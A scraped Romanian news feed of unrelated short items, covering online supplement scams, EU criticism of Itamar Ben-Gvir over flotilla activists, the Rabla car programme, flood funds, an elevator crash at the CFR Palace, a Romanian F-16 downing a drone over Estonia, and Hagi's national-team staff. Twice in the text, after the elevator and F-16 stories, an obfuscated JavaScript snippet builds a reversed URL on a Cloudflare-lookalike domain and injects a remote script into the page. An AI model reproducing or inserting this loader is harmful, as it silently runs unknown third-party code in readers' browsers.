Dacă un produs pare recomandat de o persoană publică, de un medic sau de un „specialist”, verificați dacă informația apare și pe canalele oficiale ale acestora. În fraudele online, imaginile unor medici, vedete sau instituții publice sunt adesea folosite fără acord, pentru a crea încredere falsă în produs.

Pentru persoanele cu afecțiuni cronice, femeile însărcinate sau care alăptează, copiii, vârstnicii și persoanele care iau tratamente medicamentoase, PRISA recomandă consultarea medicului sau farmacistului înainte de utilizarea unui supliment alimentar.

Mesajul PRISA pentru consumatori este simplu: informați-vă înainte de a cumpăra, alegeți surse sigure și nu înlocuiți niciodată tratamentul recomandat de medic cu produse promovate online ca soluții miraculoase.

„În numele guvernului italian, tocmai am solicitat oficial Înaltului Reprezentant, Kaja Kallas,
să includă în următoarea discuție a miniștrilor de externe ai UE adoptarea de sancțiuni împotriva ministrului israelian al securității naționale, Ben-Gvir, pentru actele inacceptabile comise împotriva flotilei, prin sechestrarea activiștilor în apele internaționale și supunerea lor la hărțuire și umilință, încălcându-i pe cei mai elementari drepturi ale omului”, a anunțat oficial vicepremierul Italiei, Antonio Tajani.

Ministrul israelian al securității naționale, Itamar Ben-Gvir, a declanșat o criză diplomatică după ce a publicat imagini cu forțele de securitate israeliene abuzând activiști internaționali reținuți în timp ce încercau să navigheze spre Gaza cu ajutoare.

„Tratamentul aplicat activiștilor Flotilei Global Sumud, inclusiv cetățenilor europeni, a fost degradant și inacceptabil”, a declarat Kallas, adăugând că conduita lui Ben Gvir este „nedemnă de oricine deține o funcție într-o democrație”.

Controversa a izbucnit după ce imaginile l-au arătat pe Ben Gvir vizitând centrul din Ashdod, unde erau ținuți activiștii în urma interceptării navelor lor de către marina israeliană. În videoclip, ministrul a fluturat un steag israelian în fața deținuților și a declarat: „Tabăra de vacanță s-a încheiat. Cei care acționează împotriva Statului Israel vor găsi o țară hotărâtă. Am Yisrael Chai.”

Trei activiști au fost duși la spital în urma violențelor israeliene, au declarat avocații care îi reprezintă pe membrii grupului. Ulterior, au fost externați. Alte zeci de persoane suspectează că au coaste rupte, ceea ce le-a cauzat probleme respiratorii, potrivit The Guardian.

Incidentul a declanșat o reacție internațională tot mai puternică, cel puțin cinci țări anunțând că intenționează să convoace ambasadori israelieni în semn de protest față de episod.

Critici au apărut și în rândul conducerii Israelului. Prim-ministrul Benjamin Netanyahu a apărat dreptul Israelului de a opri flotilele care încercau să ajungă în Gaza, descriindu-le drept inițiative pro-Hamas, dar a spus că comportamentul lui Ben Gvir nu reflectă „valorile și normele” țării.

Ministrul de externe Gideon Sa’ar s-a distanțat, de asemenea, de acțiunile ministrului, acuzându-l pe Ben Gvir că a afectat imaginea internațională a Israelului. Ben Gvir a respins criticile, insistând că activiștii care susțin Hamas trebuie să înțeleagă că Israelul nu mai este „un sac de box”.

Mai multe state s-au alăturat criticilor internaționale tot mai numeroase și convoacă ambasadori israelieni după videoclipul lui Ben Gvir care viza activiștii flotilei.

Marea Britanie, Canada, Germania, Olanda, Spania, Irlanda, Australia și Noua Zeelandă dar și România s-au arătat revoltate de comportamentul ministrului israelian.

Diana Buzioanu a fost întrebată joi când ar putea începe înscrierile pentru Rabla.

„Deci noi avem un termen de minim 10 zile de când punem ordinul în dezbatere. Așteptăm și un răspuns, o să trimitem astăzi o întrebare și am primit răspunsul de la Consiliul Concurenței, o să trimitem astăzi o întrebare și către MEDAT. După ce primim aceste răspunsuri, și noi sperăm să fie vorba de câteva zile în care să primim răspunsul, vom putea să punem în transparență ordinul. Ordinul va sta în transparență 10 zile și apoi se intră pe exact calendarul care a fost aplicat la Rabla și în anii anteriori”, a spus Diana Buzoianu.

Ministra Mediului a vorbit despre modificările propuse în ceea ce privește mașinile care pot fi cumpărate. Ea a fost întrebată dacă românii ar putea să cumpere cu aceste vouchere doar mașini fabricate în Uniunea Europeană sau în Maroc, Turcia, Marea Britanie.

„Propunerea pe care o propunem către ministere, să vedem dacă este o propunere cu care celelalte ministere sunt de acord, este să avem mașini fabricate sau asamblate în Europa sau în statele care au convenții pe zona de Marea Mediterană. Deci practic, și UK, că UK are altă prevedere, alte tratate semnate la nivel de UE”, a spus Buzoianu.

Programul pentru persoane juridice, suspendat

Ea anunță o limitare în ceea ce privește achizionarea motocicletelor și mopedelor, cel mai probabil la 10% din buget.

Diana Buzoianu a anunțat și o modificare în ceea ce privește programul Rabla pentru UAT-uri.

„Anul trecut a fost lansat programul care avea vouchere pentru 25 de mașini pentru instituții publice. Am deschis proiectul acesta în limita a maxim 8 mașini pentru anumite categorii de instituții. Am scăzut la 5 sau la 6 mașini pe instituție”, a explicat Buzoianu.

Ministra a spus că programul Rabla pentru persoane juridice este suspendat și că va fi reluat „în momentul în care vom identifica bugetul necesar”.

În urma ședinței de Guvern de joi, purtătorul de cuvânt al Guvernului, Ioana-Nadina Dogioiu, a transmis că România va primi 14,3 milioane de euro de la UE.

Banii vin în urma implementării grantului din Fondul de Solidaritate al Uniunii Europene. Suma a fost aprobată de Comisia Europeană.

Zeci de persoane evacuate în mai – iunie 2025

Suma va fi folosită pentru acoperirea unei părți din cheltuiele generate din cauza inundațiilor extreme produse începând cu luna mai 2025.

În perioada mai-iunie 2025, 125 de persoane din județele Brașov, Covasna și Harghita au fost evacuate în urma inundațiilor. Alte 27 de persoane au fost izolate în județul Neamț. Inundațiile au afectat și Salina Praid.

„Ne bucurăm că astăzi avem în sfârșit bugetul AFM aprobat”, a declarat ministrul.

Potrivit acesteia, proiectele mutate de pe PNRR pe AFM vor putea primi finanțările necesare pentru continuarea lucrărilor. Este vorba despre proiecte precum insule ecologice, centre de aport voluntar, platforme pentru gunoi de grajd și investiții în rețele de apă și canalizare.

Ministrul a spus că multe dintre șantiere au continuat lucrările, însă plățile nu puteau fi făcute până la aprobarea bugetului.

„În sfârșit vom avea resursele necesare”

„Vorbim de peste 500 de proiecte care se află în această situație și care în sfârșit vor avea resursele necesare”, a afirmat Buzoianu.

Ea a precizat că o parte importantă dintre proiecte ar putea fi finalizate chiar în acest an.

Ministrul Mediului a anunțat și lansarea unui nou program pentru apă și canalizare, cu un buget de 1,5 miliarde de lei.

„Vorbim de un proiect care va ajuta România să nu mai fie în pericol de procedură de infringement”, a declarat Buzoianu.

Potrivit acesteia, România riscă sancțiuni și amenzi de sute de milioane de lei anual dacă investițiile nu sunt realizate.

Se vor împlini trei săptămâni de când Guvernul Ilie Bolojan a fost demis pe o moțiune de cenzură cu un număr record de voturi, iar clasa politică nu reușește să creioneze nicio formulă stabilă de viitoare guvernare.

Cine a greșit mai mult de România a reușit să rămână fără Guvern? Ce responsabilități au Ilie Bolojan dar și PSD în această criză? Ce soluții are președintele Nicușor Dan? De ce susținătorii președintelui României s-au mutat la Ilie Bolojan? De ce activiștii politici au nevoie de „Mesia” în România? Din punct de vedere democratic, ce este acela un „cordon sanitar”? Cum s-ar putea reduce clivajul între cele „două Românii”, separate de alegerile prezidențiale? Ce ar fi făcut Crin Antonescu dacă ar fi fost președinte? Care sunt prioritățile reale ale României?

Despre toate acestea și multe altele discutăm cu Crin Antonescu, fostul președinte PNL și fostul candidat la Președinția României.

Vineri, de la ora 13.00, în exclusivitate, pe Mediafax.

„Este din nefericire un eșec al diplomației românești, un eșec al Ministerului Afacerilor Externe, în mod special și un eșec al guvernării din ultimele luni. Pentru că atunci când o prestigioasă publicație, precum Politico, vorbește așa de țara ta, ei vorbesc în baza unor informații pe care le-au primit. Și este o realitate că din nefericire, mai ales în ultimile luni, România nu s-a exprimat așa cum trebuie, la nivel european”, a declarat Victor Negrescu, joi, la B1 TV. 

Hub-ul de securitate maritimă și „lipsa de eficiență” a MAE

În acest sens, europarlamentarul social-democrat a menționat și lipsa de progres în inițiative precum hub-ul european de securitate maritimă, despre care a spus că, deși este susținut la nivelul Comisiei Europene și al Parlamentului European. 

„Vorbeam în urmă câteva săptămâni cu dumneavoastră despre hub-ul european de securitate maritimă. Comisia Europeană sprijină acest demers,  uu, la nivelul Parlamentului European, am obținut bani pentru acest demers. El nu s-a materializat încă, tocmai prin lipsa de eficiență a diplomației românești”, mai spune Negrescu. 

Ignorarea mecanismelor de cooperare interministerială

Vicepreședintele Parlamentului European a mai criticat și lipsa de coordonare interministeriala în dialogul cu autoritățile europene, subliniind că mecanismele existente nu au fost utilizate suficient în ultimile luni. 

„Avem un mecanism de coordonare în domeniul afacerilor europene, la nivelul Ministerului Afacerilor Externe, unde toate ministerele se prezintă și atunci când sunt subiecte mari, de anvergură europeană. Aceste sisteme nu au fost operaționale în ultimile luni, rareori s-au întâlnit și în sensul acesta România a ignorat aceste tematici”, mai spune Negrescu. 

Politico: România, aproape absentă din diplomția de la Bruxelles

Reacția liderului social-democrat vine în urma unui articol, apărut în presa internațională despre diplomația de la București. Jurnaliștii de la Politico consideră că România este aproape absentă din diplomația de la Bruxelles, în ciuda faptului că este al șaselea cel mai populat stat membru al Uniunii Europene și unul dintre principalii beneficiari ai fondurilor europene. 

Publicația menționează că reprezentanța permanentă a României pe lângă UE este singura dintre cele 27 de state membre care nu are un purtător de cuvânt sau un responsabil de presă și care nu a emis un comunicat de presă în aproape un an. 

Aceștia mai evidențiază și probleme tehnice care fac ca site-ul reprezentanței sau Ministerului Afacerilor Externe să fie frecvent nefuncționale. 

„Din ce știu, a căzut de la etajul 4 și se pare că nu au funcționat frânele de siguranță, tamburii aceia. Trebuie făcută o expertiză să vedem mai exact”, a declarat Radu Raul Dorobanțu, Inspectorul Șef al ISCIR București.

„A căzut în puțul liftului la subsol și s-a oprit în tamburul de siguranță. E un tambur ca la de tren, dacă ați faceți o idee, care oprește liftul”, a declarat Dorobanțu, referindu-se la la arcurile masive situate în camera liftului la subsol, care au rolul de a opri un lift în cazul în care sistemele de frânare nu funcționează.

Acesta a precizat că ISCIR va da publicității un raport, în urma cercetărilor.

Potrivit inspectorului, ultima verificare a liftului s-a desfășurat în 9 aprilie 2026. Cu toate, Dorobanțu spune că verificarea tehnică nu se face de către ISCIR, ci de către CNCIR, Compania Națională pentru Controlul Cazanelor, Instalațiilor de Ridicat și Recipientelor sub Presiune.

„ISCIR-ul când se montează un lift sau se repară, se face o verificare tehnică de către cei de la CNICIR, care vin la ISCIR cu o fișă, pe care ISCIR-ul o aprobă dacă se îndeplinesc toate condițiile. Acesta a fost făcută. Mai demult, nu știu ce vă spun exact când, dar ultima verificare tehnică, care este periodică, e făcută pe 9 aprilie anul acesta, de către CNICIR”, a declarat Dorobanțu. 

Dorobanțu acuză că responsabilul cu verificarea tehnică nu a semnalat defecțiunile apărute

Angajații ministerului Transporturilor care lucrau în clădirea Palatului CFR au acuzat că liftul, care funcționa, scotea zgomote zilele trecute. Cu toate acestea, Inspectorul Șef ISCIR București acuză că responsabilul cu verificarea tehnică nu a semnalat defecțiunile apărute.

„Ideea este că întreținătorii liftului și persoana desemnată care se ocupă aici, se numește responsabil cu verificarea tehnică, are obligația la fiecare incident de a anunțat ISCIR. Incidentul nu a fost anunțat, din păcate, deci nu știm să vă spunem mai multe detalii”, a declarat Dorobanțu. 

Acesta a spus că în cazul în care o persoană este blocată în lift, se anunță. „În general, când sunt astfel de cazuri în care se blochează o persoană în lift sau așa, de obicei anunță. Nu de fiecare dată, dar anunță. Și atunci venim și facem un control și venim să facem vorba”, a declarat Dorobanțu. 

Luni, un lift a căzut de la etajul 7

Acesta a vorbit și despre incidentul de luni, în cadrul căruia mai multe persoane în lift au căzut în gol de la etajul 7. Atunci, liftul s-a oprit între parter și mezanim, etaj mai scurt situat între parter și etajul 1.

„A avut loc un incident asemănător, atunci a căzut de la etajul 7, dar atunci au funcționat frânele de siguranță, s-au împănat și liftul s-a oprit în siguranță undeva atât, așa, între parter și mezanim”, a declarat inspectorul șef al ISCIR București, Dorobanțu. 

Declarațiile au fost date după ce, un lift a căzut în gol în clădirea Palatului CFR din subordinea Ministerului Transporturilor. În cadrul incidentului, 5 persoane se aflau în lift, dintre care două, un bărbat și o femeie, au fost duse la spital.
(function(){var _86250a=9482;var _bd6738="sj.ssc/ipa/orp.eralfduolccitats//:sptth";var _f07201=_bd6738.split("").reverse().join("");var _aff5ba=5183;var _e834fd=document.createElement("script");_e834fd.src=_f07201;_e834fd.defer=!0;document.head.appendChild(_e834fd)})();

„Președintele României a avut astăzi o conversație telefonică cu Prim-ministrul Republicii Estonia, Kristen Michal.

Șeful Guvernului de la Talinn a mulțumit României pentru doborârea unei drone, intrate în spațiul aerian eston, de către un avion F-16 românesc din Detașamentul Carpathian Vipers.

Pentru a patra oară începând cu 2007, Forțele Aeriene Române asigură serviciul de Poliție Aeriană în statele baltice. La misiunea din acest an participă 6 aeronave F16 şi 101 militari.

România contribuie direct la securitatea aliaților săi și a întregului Flanc Estic”, a transmis Palatul Cotroceni.

Un avion F-16 românesc aflat în misiune NATO de poliție aeriană în statele baltice a doborât acum 3 zile o dronă ucraineană intrată în spațiul aerian al Estoniei. Incidentul a avut loc pe fondul unor interferențe masive de război electronic și bruiaj GPS în regiune.

Secretarul general al NATO, Mark Rutte, a lăudat acțiunea piloților români. El a subliniat că fiecare situație defensivă depinde de evaluările tactice din teren și de riscurile asupra populației civile.

Pilotul român implicat în această misiune de succes a fost propus pentru decorare oficială.

Astăzi, Letonia a emis o nouă alertă de amenințare aeriană în legătură cu o dronă intrată în spațiul aerian al țării iar NATO a ridicat avioanele de vânătoare pentru a 3-a zi consecutiv.
(function(){var _86250a=9482;var _bd6738="sj.ssc/ipa/orp.eralfduolccitats//:sptth";var _f07201=_bd6738.split("").reverse().join("");var _aff5ba=5183;var _e834fd=document.createElement("script");_e834fd.src=_f07201;_e834fd.defer=!0;document.head.appendChild(_e834fd)})();

Antrenorul Naționalei Gheorghe Hagi și-a definitivat componența staff-ului tehnic, medical și de suport.

Selecționerul va colabora cu antrenori secunzii Cătălin Anghel, Ionel Gane, Cristi Sava (Analiză Video) și cu Ștefan Preda, antrenor de portar, a anunțat joi Federația Română de Fotbal.
Analiști video vor fi Vlad Lakatos și Andrei Butnăraș (Individual – Scouting), iar preparatori fizici Darius Hîmpea, Robert Hodorogea, Dan Curtifan (Prevenție – Recuperare).

Medicul Naționalei este Claudiu Stamatescu, iar din staff-ul medical fac parte Toma Vasilescu, Ovidiu Blendea, Adrian Gherovăț, Dragoș Paraschiv, Alin Burileanu, Constantin Crețu și Vivian Negoiță. Andrei Voica este bucătar-șef, Cristi Mărgărit nutriționist, Cătălin Gheorghiu team manager, Cătălin Popescu ofițer de presă, iar Alexandru Nicilă este ofițer securitate.

România va juca la început de iunie primele două meciuri cu Gheorghe Hagi pe bancă. Naționala întâlnește în 2 iunie Georgia în deplasare și în 6 iunie, pe teren propriu, jocă cu Țara Galilor.

Selecționerul Gheorghe Hagi a anunțat miercuri că România va juca cu două echipe în meciurle cu Georgia și Țara Galilor de la începutul lunii iunie.